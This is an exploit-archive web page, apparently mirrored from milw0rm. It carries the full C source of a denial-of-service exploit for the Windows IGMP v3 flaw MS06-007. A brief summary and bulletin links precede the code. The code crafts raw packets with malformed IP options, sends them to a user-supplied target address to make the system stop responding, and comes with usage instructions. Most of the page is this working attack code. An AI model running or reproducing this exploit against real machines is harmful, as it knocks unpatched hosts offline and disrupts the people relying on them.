首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
IGMP v3 DoS (MS06-007, Exploit)
来源:http://www.milw0rm.com/exploits/1599 作者:Alexey 发布时间:2006-03-23  

IGMP v3 DoS (MS06-007, Exploit)

Summary
The Internet Group Management Protocol (IGMP) is a communications protocol used to manage the membership of Internet Protocol multicast groups. IGMP is used by IP hosts and adjacent multicast routers to establish multicast group memberships. It is an integral part of the IP multicast specification, like ICMP for unicast connections.

A specially crafted IGMP packet sent to a vulnerable system could create a denial of service situation and cause the system to stop responding.

Credit:
The original article can be found at:
http://www.milw0rm.com/exploits/1599
Related articles:
TCP/IP IGMP DoS (MS06-007)
http://www.microsoft.com/technet/security/Bulletin/MS06-007.mspx

Details
/*
IGMP v3 DoS Exploit

ref: http://www.juniper.net/security/auto/vulnerabilities/vuln2866.html
ref: http://www.microsoft.com/technet/security/Bulletin/MS06-007.mspx

by Alexey Sintsov (dookie@inbox.ru)

Req:
Administrator rights on system
Windows Firewall off (for sending RAW packets)

Affected Products:
Microsoft Corporation Windows XP All
Microsoft Corporation Windows Server 2003 All
*/


#include <stdio.h>
#include <winsock2.h>

#pragma comment(lib, "Ws2_32.lib")

typedef struct iphdr
{
unsigned char verlen; // IP version & length
unsigned char tos; // Type of service
unsigned short total_len; // Total length of the packet
unsigned short ident; // Unique identifier
unsigned short frag_and_flags; // Flags
unsigned char ttl; // Time to live
unsigned char proto; // Protocol (TCP, UDP etc)
unsigned short checksum; // IP checksum
unsigned int sourceIP; // Source IP
unsigned int destIP; // Destination IP
unsigned short options[2];

} IPHEADER;

typedef struct igmphdr {
unsigned char type;
unsigned char code;
unsigned short checksum;
unsigned long group;
unsigned char ResvSQVR;
unsigned char QQIC;
unsigned short num;
unsigned long addes;

} IGMPHEADER;

USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;

while (size > 1) {
cksum += *buffer++;
size -= sizeof(USHORT);
}

if (size)
cksum += *(UCHAR*)buffer;

cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);

return (USHORT)(~cksum);
}

int sendIGMP(char* a, char* b)
{
unsigned int dst_addr, src_addr;

IPHEADER ipHeader;
IGMPHEADER igmpHeader;
dst_addr=inet_addr (b);
src_addr=inet_addr (a);

char szSendBuf[60]={0};
int rect;

WSADATA WSAData;
if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0)
return FALSE;

SOCKET sock;
if ((sock = WSASocket(AF_INET,SOCK_RAW,
IPPROTO_RAW,NULL,0, 0x01)) == INVALID_SOCKET) {
printf("Create socket error");
WSACleanup();
return FALSE;
}

BOOL flag=TRUE;
if (setsockopt(sock,IPPROTO_IP,2,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) {
printf("Set options error");
closesocket(sock);
WSACleanup();
return FALSE;
}

SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family=AF_INET;
ssin.sin_port=htons(99);
ssin.sin_addr.s_addr=dst_addr;

ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(igmpHeader));

ipHeader.ident=htons(0);

ipHeader.frag_and_flags=0;

ipHeader.ttl=128;
ipHeader.proto=IPPROTO_IGMP;

ipHeader.checksum=0;

ipHeader.tos=0;

ipHeader.destIP=dst_addr;
ipHeader.sourceIP=src_addr;

//Ip options
ipHeader.options[0]=htons(0x0000); //bug is here =)
ipHeader.options[1]=htons(0x0000);

igmpHeader.type=0x11; //v3 Membership Query
igmpHeader.code=5;
igmpHeader.num=htons(1);
igmpHeader.ResvSQVR=0x0;
igmpHeader.QQIC=0;
igmpHeader.group=inet_addr("0.0.0.0");
igmpHeader.addes=dst_addr;

igmpHeader.checksum=0;

memcpy(szSendBuf, &igmpHeader, sizeof(igmpHeader));

igmpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(igmpHeader));

memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &igmpHeader, sizeof(igmpHeader));
memset(szSendBuf+sizeof(ipHeader)+sizeof(igmpHeader), 0, 4);

ipHeader.checksum=ntohs(checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(igmpHeader)));

memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));

rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(igmpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin));

if (rect==SOCKET_ERROR) {
printf("Send error: <%d>\n",WSAGetLastError());
closesocket(sock);
WSACleanup();
return 0;
}

closesocket(sock);
WSACleanup();

return 1;
}

main(int argc, char **argv)
{
if(argc<2)
{
printf("\nIGMP v3 DoS Exploit (MS06-007) by Alexey Sintsov(dookie@inbox.ru)\n\n");
printf("Usage:\n");
printf("c:\\igmps.exe <target ip> <source ip>\n\n");
exit(0);
}

sendIGMP(argv[2], argv[1]);
return 0;
}




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·FarsiNews Remote File Inclusio
·ASPPortal <= 3.1.1 Remote S
·Apple Mac OS X File Rewrites a
·The IIS Worker Process (w3wp)
·BomberClone Buffer Overflow Ex
·VWar Remote Code Execution (Ex
·X.Org X11 (X11R6.9.0/X11R7.0)
·Internet Explorer 0day Unoffic
·A vulnerability in HT 9.1 Expl
·Zdaemon and xdoom Multiple Vul
·Mercur IMAPD Buffer Overflow (
·MS Internet Explorer (createTe
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved